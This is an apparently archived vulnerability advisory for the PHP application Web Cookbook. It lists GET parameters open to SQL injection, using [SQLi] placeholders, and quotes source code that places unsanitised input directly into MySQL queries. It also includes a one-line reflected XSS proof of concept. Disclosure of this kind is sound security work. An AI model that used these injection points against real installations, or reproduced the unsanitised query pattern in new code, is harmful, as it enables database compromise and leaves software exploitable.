[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Web Cookbook - Multiple SQL Injection Vulnerabilities
# Published : 2013-03-13
# Author :
# Previous Title : Alt-N MDaemon 13.0.3 and 12.5.6 Email Body HTML/JS Injection Vulnerability
# Next Title : Apache Rave 0.11 - 0.20 - User Information Disclosure


# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah  saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

# SQL Injection

http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=


http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
	initDB();
	echo "<div class="rdisplay">n";
	$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
	$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
	$title = $_GET['title'];
	$prefix = $_GET['prefix'];
	$preparation = $_GET['preparation'];
	$postfix = $_GET['postfix'];
	$tipp = $_GET['tipp'];
	$ingredient = $_GET['ingredient'];
	.
	.
	.
	if ($title != "") {
		$sstring = "a.title LIKE '%$title%' ";
	}
	.
	.
	searchRecipe($mode, $sstring);
	.
	.
	In Function SearchRecipe
				$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
		if ($sstring != "") {
			searchRecipe(0, $sstring);
.
.
.
	$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=


#Independent Pakistani Security Researcher